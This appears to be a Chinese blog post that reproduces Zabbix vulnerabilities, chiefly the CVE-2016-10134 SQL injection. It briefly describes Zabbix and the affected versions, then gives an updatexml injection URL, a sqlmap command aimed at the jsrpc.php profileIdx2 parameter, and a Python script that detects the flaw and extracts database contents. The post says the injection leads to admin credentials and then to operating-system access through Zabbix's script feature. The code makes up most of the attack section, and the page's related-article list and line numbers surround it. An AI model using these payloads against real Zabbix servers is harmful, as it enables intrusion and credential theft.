- 1K8S认证|CKA题库+答案| 15. 备份还原Etcd
- 2今日选题。
- 3makefile清除目标文件的规则_makefile 宏 删除指定文件
- 4解决github网站的css,js文件被墙
- 5Hadoop 集群搭建_hadoop集群搭建
- 6Git学习篇-指令全集
- 7基于Python的豆瓣电影评论数据分析与可视化(源代码+可远程部署安装)_评论数据研究背景
- 8PTAN实战二 || 智能体agent类_自定义dqnagent
- 9数据结构(C语言)快速排序_数据结构排序综合c语言
- 10iOS 图片轮播图浅析,教你用SDCycleScrollView自定义样式,附带轮播头部下拉放大效果_sdcyclescrollview 自定义
漏洞复现-zabbix系列_cve-2020-11800
赞
踩
介绍
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
zabbix由2部分构成,zabbix server与可选组件zabbix agent。
zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。
Guest
https://mp.weixin.qq.com/s/rt3ikDwANAsZZIAGNbC-Iw
sql注入漏洞 CVE-2016-10134
https://mp.weixin.qq.com/s/Gi3NMbZcgMutE8mNqCmNAw
zabbix 2.2.x, 3.0.0-3.0.3版本
latest.php中的toggle_ids[]或jsrpc.php中的profieldx2参数存在sql注入
存在SQL注入漏洞,攻击者通过未授权进入zabbix管理系统,进入后台使用script等功能直接获取zabbix服务器的操作系统权限。
https://mp.weixin.qq.com/s/gYcZ2FecLt3acz42kHyNWw
通过sql注入获取管理员账户密码,或者通过更换sessionid进入后台,利用后台的script功能直接获取zabbix服务器的操作系统权限。
zabbix 2.2.x,3.0.0-3.0.3
/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0x7e,database()),0x7e)
sqlmap.py -u "http://192.168.14.128:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0x7e,database()),0x7e)" -p profileIdx2
# -*- coding: utf-8 -*- # Date: 2016/8/18 import urllib2 import sys, os import re def deteck_Sql(): u'检查是否存在 SQL 注入' payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" try: response = urllib2.urlopen(url + payload, timeout=10).read() except Exception, msg: print msg else: key_reg = re.compile(r"INSERT\s*INTO\s*profiles") if key_reg.findall(response): return True def sql_Inject(sql): u'获取特定sql语句内容' payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote( sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" try: response = urllib2.urlopen(payload, timeout=10).read() except Exception, msg: print msg else: result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") results = result_reg.findall(response) if results: return results[0]
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
